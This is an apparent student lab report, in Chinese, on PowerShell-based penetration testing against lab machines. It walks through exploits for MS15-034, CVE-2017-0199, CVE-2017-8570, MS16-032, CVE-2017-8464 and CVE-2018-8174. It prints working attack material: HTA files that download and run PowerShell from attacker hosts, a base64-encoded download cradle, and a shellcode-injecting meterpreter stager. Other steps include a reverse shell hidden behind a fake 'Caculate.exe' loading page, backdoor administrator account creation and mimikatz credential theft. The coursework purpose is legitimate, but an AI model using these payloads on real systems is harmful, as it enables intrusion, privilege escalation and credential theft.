2018-2019-2 20165330《网络对抗技术》Exp10 Final 基于PowerShell的渗透实践

目录

• 实验内容
• 实验步骤
• 实验中遇到的问题
• 实验总结与体会

---

实验内容

• PoweShell简介
• PowerShell入门学习
• PowerShell渗透工具介绍
• 相关渗透实践分析
  • ms15-034之Powershell版攻击
  • CVE-2017-0199结合PowerShell
  • 沙虫”二代漏洞（CVE-2017-8570）分析
  • EMPIRE内置ms16-032漏洞
  • "震网三代" CVE-2017-8464
  • “双杀”0day漏洞 CVE-2018-8174
• PowerShell利用现状

返回目录

---

实验步骤

1、PowerShell简介

1.PowerShell是什么

• PowerShell，从名字能够知道，它首先是一个shell，shell的意思就是和Linux的bash等同样、和原来的cmd同样即在里边敲命令（可执行文件）使用；而Power就意味它是一个功能强大的shell。
• 其功能强大致如今如下几方面：
  • Shell的简单性，简单的命令，即时与系统交互；另外微软切实的推行PowerShell，包括Office等更多自家软件，底层都是调用PowerShell来实现。
  • 兼容性cmd。PowerShell包含原先cmd的全部命令，原先命令使用形式不变，在是在其基础上添加命令。
  • 对标Linux。PowerShell使用了Linux Shell的思想，也就是全部的系统操做、配置，均可以在shell中敲写命令实现。

2.PowerShell做用

（1）与文件系统交互、运行应用程序

• 像在Dos中同样，在PowerShell的交互界面上键入dir并回车，会显示当前文件夹下的子文件夹和文件信息
  
• 能够进入到应用程序或文件所在目录下，使用.\名称打开应用程序或文件
  

（2）建立脚本

• PowerShell支持将命令列表作成脚本文件来执行。在 Windows PowerShell 中，脚本文件的文件扩展名为 .ps1。若要运行脚本，在命令提示符下键入该脚本的名称，文件扩展名是可选的。

  • test：下面是hello.ps1脚本文件的内容

    $a = "Hello"
    $a
    echo $a > a.txt
    dir a.txt

    这个脚本：先定义了一个变量，而后输出这个变量的结果，再将这个变量的值写入文件a.txt，最后输出这个文件的属性信息

  • 运行结果
    

（3）powershell 背后依靠的是一套完整的 .NET 编程体系，可以利用.Net类型和COM对象，这让PowerShell可以最大限度的利用现有资源，而且很容易把.Net和COM程序员招徕到本身麾下

• 简单类型：

  [int]$a = 10
  [String]$b = 10

• .Net类型

  $Message = new-object Net.Mail.MailMessage("me@source.com","you@destination.com", "Subject", <br>　　"Here is some email")

• COM对象

  $myWord = new-object -comobject Word.Application

• 建立了.Net或者COM的对象之后，就能够利用这些对象的属性和方法，来完成更加复杂的操做。

（4）任何函数与对象都可以经过help *命令来查看其帮助文档（准确来讲应该是Get-Help函数，这是更加“面向对象”化的命名方式，而help是它的别名），若是看不明白，加上-examples参数会有应用实例，若是仍看不明白，加上-online参数会打开完整的在线帮助文档。

（5）PowerShell中兼容部分的cmd命令和unix/linux shell的命令

三、PowerShell特色

• PowerShell脚本能够运行在内存中，不须要写入磁盘。
• 能够从另外一个系统中下载PowerShell脚却本并执行。
• 目前不少工具都是基于PowerShell开发的。不少安全软件并不能检测到PowerShell的活动
• cmd.exe一般会被阻止运行，可是 PowerShell不会。
• 能够用来管理活动目录
• 这些特色使得PowerShell在得到和保持对系统的访问权限时，成为攻击者首选的攻击手段，利用PowerShell诸多特色，攻击者能够持续攻击而不被轻易发现。

2、PowerShell入门学习

• 学习博客在这：Final——PowerShell入门学习

3、渗透工具介绍

一、经常使用的PowerShell攻击工具

• PowerSploit
  • PowerShell后期漏洞利用框架,经常使用于信息探测,特权提高,凭证窃取,持久化等操做。
• Nishang
  • 基于PowerShell的渗透测试专用工具,集成了框架,脚本和各类payload,包含下载和执行,键盘记录,DNS,延时命令等脚本。
• Empire
  • 基于PowerShell的远程控制木马,能够凭证数据库中导出和跟踪凭证信息,经常使用与提供前期漏洞利用的集成模块,信息探测,凭据窃取,持久化控制。
• PowerCat
  • PowerShell版的NetCat,传说中的”瑞士军刀”,能经过TCP和UDP在网络中读取数据,经过与其余工具的结合和重定向,能够在脚本中以多种方式使用。

二、Empire

• Final——PowerShell Empire

三、Nishang

• Final——Nishang

4、相关渗透实践

一、ms15-034之Powershell版攻击

• ms15-034漏洞出在http.sys文件中，这个文件是IIS的一个重要组件，功能和特性对windows来讲意义重大。利用HTTP.sys的安全漏洞，攻击者只须要发送恶意的http请求数据包，就可能远程读取IIS服务器的内存数据，或使服务器系统蓝屏崩溃。
• ms15-034在metasploit有相应的攻击模块，auxiliary/dos/http/ms15_034_ulonglongadd模块可直接形成服务器蓝屏，auxiliary/scanner/http/ms15_034_http_sys_memory_dump检测漏洞，发现仅针对：windoiws 8.1, 2012, or 2012R2有效。

• 在PowerShell下，该代码实现了对系统检测是否有该漏洞以及dos攻击。下面咱们来实践：

  • 测试装了windows2008的服务器是否有该漏洞

    Import-Module .\MS15034.psm1
    Test-MS15034 -Computer 192.168.80.132 -Windows2008

    
    结果为存在该漏洞
    • 检测部分的代码为Test-MS15034部分

    try
    { $Result = Invoke-MS15034Helper -Computer $Computer -Port $Port -Path $SrvPath -LowerRange 0 -UpperRange 18446744073709551615 -UseSSL:$UseSSL }
    catch
    { Throw ('An error occured during the connection to http://{0}:{1}{2}' -f $Computer, $Port, $SrvPath) }
    
    Write-Verbose -Message $Result
    
    if (-not $Result.contains('Server: Microsoft'))
    { Write-Error -Message 'The server does not appear to be running HTTP.SYS' }
    elseif ($Result.contains('HTTP/1.1 416 Requested Range Not Satisfiable'))
    { 'This server is vulnerable to MS 15-034' }
    elseif ($Result.contains('HTTP Error 400. The request has an invalid header name.'))
    { 'The server is not vulnerable to MS 15-034' }
    elseif ($Result.contains('HTTP/1.1 404 Not Found'))
    { Write-Error -Message 'The provided path has not been found, check you have selected the right operating system, or specified a valid file in -ServerPath' }
    else { 'Some other error has occured ?!?!?' }

  • 执行拒绝服务攻击

    Import-Module .\MS15034.psm1
    Invoke-MS15034DOS -Computer 192.168.80.132 -Windows2008

    瞬间蓝屏重启！！
    该部分的代码在Invoke-MS15034DOS，执行时先测试被攻击的服务器是不是有漏洞的，有漏洞它才会执行攻击。这里仅执行dos攻击，dos攻击的http header须要被指定为Range: bytes=0-18446744073709551615。

    $null = Invoke-MS15034Helper -Computer $Computer -Port $Port -Path $SrvPath -LowerRange 18 -UpperRange 18446744073709551615 -UseSSL:$UseSSL

• 查找资料，该漏洞同HTTP头中的Range域有直接的关系，Range请求是HTTP协议中HTTP客户端用于只获取服务器上文件的某一部分数据的请求域。
  • IIS进程w3wp.exe接收到HTTP请求后，将数据缓存到内核中，并整合HTTP回应头，最后由http.sys组织数据包经由网络内核组件发送出去。请求中包括Ranges对象的指定范围，而缓存中则包含了http文件和大小信息等。
  • 在代码中
    • $HTTPRequest = "GET {0} HTTP/1.1rnHost: stuffrnRange: bytes={1}-{2}rnrn" -f $Path, $LowerRange, $UpperRange定义HTTP的range请求
    • 使用$TCPStream.Write($EncodedRequest,0,$EncodedRequest.Length)来发送出通过编码后的恶意HTTP请求
    • IIS收到请求后会返回信息，接收部分

    # Decode the response and then return it
    $HTTPResponse = [System.Text.Encoding]::ASCII.GetString($ReceiveBuffer,0,$TCPClientRBSize)

二、CVE-2017-0199结合PowerShell

• CVE-2017-0199是2017年4月11日发布的一个Microsoft Office RTF漏洞，当用户打开包含嵌入式漏洞的文档时，容许使用者下载并执行恶意的Visual Basic脚本。office使用用户很是多，所以该漏洞可用做许多社工攻击。
• 受影响系统包括：Microsoft office 2016；Microsoft office 2013；Microsoft office 2010；Microsoft office 2007；

• 在可访问的服务器中建一个RTF空文件：echo ''>rtf.rtf
• 新建一个word文档，打开文档找到插入-对象-由文件建立，加上http://xxxxxx/rtf.rtf，并勾选连接到文件，保存。（这里的地址是一个可访问的服务器的地址关于如何搭建服务器请看这）
  
• 将docx后缀换为zip在打开，找到word-_rels-document.xml.rels，用记事本打开

  • 找到下面的代码

    Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject" Target="http://x.x.x.x/xx.rtf"

  • 修改成如下代码后保存

    Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject" Target="http://x.x.x.x/hta.hta"

• 如今对一段反弹meterpreter的powershell语句进行base64编码（为了不一些特殊字符带来的错误）

  powershell.exe -ep bypass IEX (New-Object Net.WebClient).DownloadString('http://192.168.80.129//rev.ps1'),rev

• 在服务器中添加一个hta.hta文件，放到上面连接能访问到的位置，并将上面编码后的代码插入到下面：

  <html>
  <head>
  <script>
    var c= 'powershell.exe -ep bypass -enc cG93ZXJzaGVsbC5leGUgLWVwIGJ5cGFzcyBJRVggKE5ldy1PYmplY3QgTmV0LldlYkNsaWVudCkuRG93bmxvYWRTdHJpbmcoJ2h0dHA6Ly8xOTIuMTY4LjgwLjEyOS8vcmV2LnBzMScpO3Jldg==';new ActiveXObject('WScript.Shell').Run(c,0);
  </script>
  </head>
  <body>
  <script>
   self.close();
  </script>
  </body>
  </html>

• 在可访问的服务器下，添加一个powershell脚本rev.ps1

  function rev {
  $c = @"
    [DllImport("kernel32.dll")] public static extern IntPtr VirtualAlloc(IntPtr w, uint x, uint y, uint z);
    [DllImport("kernel32.dll")] public static extern IntPtr CreateThread(IntPtr u, uint v, IntPtr w, IntPtr x, uint y, IntPtr z);
  "@
  try{
    $s = New-Object System.Net.Sockets.Socket ([System.Net.Sockets.AddressFamily]::InterNetwork, [System.Net.Sockets.SocketType]::Stream, [System.Net.Sockets.ProtocolType]::Tcp)
    $s.Connect('127.0.0.1', 5330) | out-null; $p = [Array]::CreateInstance("byte", 4); $x = $s.Receive($p) | out-null; $z = 0
    $y = [Array]::CreateInstance("byte", [BitConverter]::ToInt32($p,0)+5); $y[0] = 0xBF
    while ($z -lt [BitConverter]::ToInt32($p,0)) { $z += $s.Receive($y,$z+5,1,[System.Net.Sockets.SocketFlags]::None) }
    for ($i=1; $i -le 4; $i++) {$y[$i] = [System.BitConverter]::GetBytes([int]$s.Handle)[$i-1]}
    $t = Add-Type -memberDefinition $c -Name "Win32" -namespace Win32Functions -passthru; $x=$t::VirtualAlloc(0,$y.Length,0x3000,0x40)
    [System.Runtime.InteropServices.Marshal]::Copy($y, 0, [IntPtr]($x.ToInt32()), $y.Length)
    $t::CreateThread(0,0,$x,0,0,0) | out-null; Start-Sleep -Second 86400
   }
  catch {}
  }

  注意其中的$s.Connect('x.x.x.x', 2333)是msf监听的地址和端口！
• 如今msf下开启监听
  

• 运行docx文件，当跳出弹框选择时已经弹回shell
  

三、“沙虫”二代漏洞（CVE-2017-8570）分析

• 在以前的实验中我有作过该漏洞实践（连接），该漏洞为Microsoft Office的一个远程代码执行漏洞。其成因是Microsoft PowerPoint执行时会初始化“Script”Moniker对象，而在PowerPoint播放动画期间会激活该对象，从而执行sct脚本（Windows Script Component）文件。
• 咱们查看样本内部的ppt\slides\_rels\slide1.xml.rels文件，会发现其中Id为rId3的是一个OLE对象，指向一个外部连接
  
• 该连接指向一个远程服务器上的sct脚本文件，其内容以下，主要功能是经过powershell下载咱们用msfvenom生成的恶意代码。
  
• 咱们查看监听过程就能够看到请求
  

• 靶机运行ppsx，就激活对象，kali方获得下载请求，下载后发送恶意代码

  with open(payloadlocation) as fin:
        data +=fin.read()
        onn.send(data)
        conn.close()
        sys.exit(1)

• 查看ppt\slides\slide1.xml文件，其中rId3被定义为一个link对象，并设置了verb行为。verb的功能是在PowerPoint播放动画时激活这个对象，从而执行远程下载的脚本文件，因此咱们会看到在执行时闪退一个cmd框，其就在运行恶意powershell脚本。
  

四、EMPIRE内置ms16-032漏洞

• 该漏洞是Windows特权提高漏洞，若是 Windows 辅助登陆服务未能正确管理内存中的请求句柄，Microsoft Windows 中会存在一个特权提高漏洞。 成功利用此漏洞的攻击者可以以管理员身份运行任意代码。 攻击者可随后安装程序；查看、更改或删除数据；或者建立拥有彻底用户权限的新账户。

• 启动Empire：./empire
• 咱们按照以前的Final——PowerShell Empire拿到上线主机
  
• 与靶机交互：interact tcc

• 内置模块ms16-032提权

  usemodule privesc/ms16-032
  set Listener xiaobai
  execute

• 查看返回结果
  
  emm显示个人主机没有未捕获有效的线程句柄，看来是有相关补丁，咱们换一个系统
• 而除了上面方式，该漏洞有对应脚本（连接），如今换种方式对win7虚拟机进行ms16-032漏洞提权。
  • 调用脚步：. .\Invoke-MS16-032
  • 执行提权：Invoke-MS16-032
  • 结果显示错误提示系统须要有2个以上的CPU核心，正在退出！
    

• 查阅资料才知道ms16-032漏洞提权须要两个条件

  目标系统须要有2个以上的CPU核心
  PowerShell v2.0及更高版本必须正在运行

• 因此对虚拟机的处理器进行修改修改成2个处理器
  
• 重启win7后从新提权：Invoke-MS16-032，成功！获得一个最高权限！
  
• 下面就能够进行一些操做了
  • 添加新用户：net user 1 1 /add
  • 给新用户赋予最高权限：net localgroup administrators 1 /add
• 咱们试着远程登录另外一台计算机（目标机要开启远程登录功能，参考远程桌面链接
  • 输入命令：mstsc
  • 输入目标的IP
    
  • 输入密码后登录入系统
    

五、"震网三代" CVE-2017-8464

• 该漏洞原理：Windows系统经过解析 .LNK 后缀文件时，是使用二进制来解析的，而当恶意的二进制代码被系统识别执行的时候就能够实现远程代码执行，因为是在explorer.exe进程中运行的，因此load进内存的时候与当前用户具备相同的权限。因而攻击者利用这一解析过程的漏洞，将包含恶意二进制的代码被附带进可移动驱动器(或远程共享过程当中)，受害者使用powershell解析 .LNK 文件后就会被黑客所控制。
• 影响版本：Windows 七、Windows 8.一、Windows RT 8.一、Windows 十、Windows Server 200八、Windows Server 2008 R二、Windows Server 20十二、Windows Server 2012 R二、Windows Server 2016

• 使用Empire工具对Win7系统进行攻击

  • 咱们先生成Windows可以识别的.bat脚本文件

    usestager windows/launcher_bat
    set Listener tc
    execute

  • 使用记事本打开bat脚本时，能够看到，恶意二进制代码使用base64加密
    
• 将这此.bat文件在Windows中运行，回到监听端口就能够看到目标主机已经上线
  
• 接下来咱们进入监听的win7，进行进一步的提权操做
  • 与靶机交互：interact 名称
  • 使用模块：usemodule code_execution/invoke_shellcode
    能够将shell弹回msf进行提权，要注意所设置的LPORT和LHOST与msf设置的同样。
    
    
    这里我没有回弹成功，我就继续使用Empire进行提权吧
  • 使用mimikatz获取用户明文密码
    
  • 获取靶机剪切板内容：usemodule collection/clipboard_monitor
    
  • 执行文件中的调试器usemodule lateral_movement/invoke_wmi_debugger
    
• 另外查阅资料找到一位做者写的用脚本复现
  • LNKOutPath：本地保存LNK文件的全路径。
  • TargetCPLPath：本地/远程目标cpl的全路径。
  • 使用：Export-LNKPwn -LNKOutPath C:\Users\ASUS\Desktop\aaa\bbb\Path.lnk -TargetCPLPath C:\Users\ASUS\Desktop\Path.cpl -Type SpecialFolderDataBlock

六、“双杀”0day漏洞 CVE-2018-8174

• CVE-2018-8174是Windows VBScriptEngine代码执行漏洞，因为 VBScript 脚本执行引擎(vbscript.dll)存在该漏洞，攻击者能够将恶意的VBScript嵌入到Office文件或者网站中，一旦用户受诱导或不慎点击恶意连接或文档，攻击者即可远程获取当前用户系统权限，进而彻底控制用户电脑。

• 构造HTA文件，当访问hta文件就会触发powershell下载文件至临时目录执行（利用 mshta 从远程服务器下载文件执行）。

  <script>
   a=new ActiveXObject("WScript.Shell");
   a.run('%SystemRoot%/system32/WindowsPowerShell/v1.0/powershell.exe -windowstyle hidden (new-object System.Net.WebClient).DownloadFile(\'http://10.0.0.216/test.hta\', \'c:/windows/temp/mshta.exe\'); c:/windows/temp/WINWORD.exe', 0);
   window.close();
   </script>

• kali下把test.hta文件放在/var/www/html目录下
• 使用msfvenom生成js Shellcode：msfvenom -p windows/exec cmd='mshta http://10.0.0.230/test.hta' -f js_le exitfunc=thread -a x86
  
• 下载 metasploit 模块到本地：git clone https://github.com/0x09AL/CVE-2018-8174-msf.git
  • 将CVE-2018-8174.rb复制到 fileformat目录：cp CVE-2018-8174.rb /usr/share/metasploit-framework/modules/exploits/windows/fileformat/
  • 将CVE-2018-8174.rtf复制到 exploits目录：cp CVE-2018-8174.rtf /usr/share/metasploit-framework/data/exploits/
• 下载CVE-2018-8174 python脚本：git clone https://github.com/Yt1g3r/CVE-2018-8174_EXP.git
• 把生成的Shellcode字符替换至 CVE-2018-8174.py该行代码处
  
• 生成Word文档：python CVE-2018-8174.py -u http://10.0.0.230/exploit.html -o exp.rtf
• 将生成的网页和文档放入/var/www/html目录下
• 开启apache服务：service apache2 start
• 由于个人rtf文件打开有问题，我就直接用靶机浏览器访问http://10.0.0.230/exploit.html下载执行test.hta文件，并提早开好开启wireshark抓包。（这是以前用另外一台kali10.0.0.216时抓的包）
  
  紧接着，咱们就看到执行了test.hta文件，
  

• 如今咱们利用以前的实践学习修改test.hta，获取反弹shell，内容以下：

  <body>
    <title>XXX-exp</title>
    <center>
    <h1>Caculate.exe</h1>
    <br>
    <h2>Loading...</h2>
   <br>
   [<marquee scrollAmount=4 width=350 direction=right>|||||||||||||</marquee>]100%
   <br>
   </center>
   <script language="VBScript">
    Set Hackdo = CreateObject("Wscript.Shell")
    Set Check = CreateObject("Scripting.FileSystemObject")
    If Check.FileExists(Hackdo.ExpandEnvironmentStrings("%PSModulePath%") + "..\powershell.exe") Then
     Hackdo.Run "powershell IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/samratashok/nishang/9a3c747bcf535ef82dc4c5c66aac36db47c2afde/Shells/Invoke-PowerShellTcp.ps1');Invoke-PowerShellTcp -Reverse -IPAddress 192.168.80.131 -port 5330",vbhide
    Hackdo.Run "taskkill /f /im mshta.exe"
   End If
   </script>     
    </body>
    </html>

• 靶机从新访问http://10.0.0.230/exploit.html

• kali下监听端口：nc -lvvp 5330，发现获取shell
  

返回目录

---

PowerShell利用现状

• 近些年利用PowerShell执行恶意代码的攻击频繁发生。此类型攻击利用受害者系统受信任程序的特色，达到系统应用白进程执行恶意代码，从而使受害者难以发现。
• 攻击者一般是利用爆出已久的高危安全漏洞来进行攻击，其中Weblogic反序列化漏洞、MS17-0十、Struts2系列漏洞都备受攻击者青睐。部分攻击者还会结合社工，钓鱼的方式利用恶意邮件，并结合Office宏来执行恶意代码，进一步实施攻击。据统计，攻击者在入侵成功后，最喜欢投放的是挖矿木马，其次为勒索病毒，这与数字货币当前的热潮有直接关系。

返回目录

---

实验中遇到的问题

• 使用PowerShell执行本身建立的脚本时，提示没法加载文件，由于在此系统中禁止执行脚本。有关详细信息，请参阅 "get-help about_signing"

  解决方法：经过查找资料知道这是为了防止恶意脚本执行，powershell默认安全设置里禁用了执行脚本，要启用这个功能须要拥有管理员的权限。因此咱们须要在管理员身份运行的PowerShell下输入set-ExecutionPolicy RemoteSigned改变执行策略，修改为功后就能够在普通用户下运行脚本啦！

• 在使用Empire运行./empire时报错ImportError: No module named iptools
  

  解决方法：python库中缺乏该模块，使用pip install 模块名称来下载便可，继续运行./empire，直至再也不报错。

• 导入Nishang框架时报错由于缺乏脚本的“#requires”语句指定的如下模块: ActiveDirectory

  解决办法：在电脑中找到控制面板-程序-启用或关闭windows功能，在功能列表中找到Active Directory轻型目录服务，选中后点击肯定按钮便可。

• 用PowerShell远程下载服务器中的脚本文件时，出现错误提示远程服务器返回错误: (404) 未找到

  解决方法：参考“远程服务器返回错误: (404) 未找到”的正确解决方法，打开IIS管理器，找到MIME类型，添加一个MIME的类型：扩展名：.* 类型：application/octet-stream

---

实验总结与体会

• 到如今一学期的网络对抗就结束了，这门课也带给我不同的体会，在以前的实验课里，我体验到不本身动手去实践，是真的不会懂实验的原理是什么，验收的时候也是检验是否真的实践的方式，从第一次验收的有点不知所措，到后来清晰老师的问题，明白是什么怎么作，个人实践能力也潜移默化的提升了！本次免考一开始是在网上找资料想本身要作什么，偶然就看到了powershell，觉得只是跟cmd差很少，在完成免考的过程当中，才知晓它的强大，从它独立的语言看起，到综合资料完成一步步的攻击实践，我其实也还只是尝试了它的一角，如今各类病毒也正朝powershell的特色，悄无声息的攻击网络达到目的，也让我意识到在网络世界掌握必要的安全技术的重要性，同时咱们所学的专业也有所涉及，但愿在从此的学习中能够更多发掘对专业的认识，继续锻炼实践能力，尝试更多本身没有想过的东西！

参考资料

• PowerShell 在线教程
• MS15-034 PowerShell poc
• IIS最新高危漏洞（CVE-2015-1635，MS15-034）分析
• “震网三代”（CVE-2017-8464）
• “震网三代”（CVE-2017-8464）的几种利用方法与防范
• Powershell攻击指南----黑客后渗透之道
• MS16-032提权正确方法
• CVE-2017-0199
• CVE-2018-8174 “双杀”0day漏洞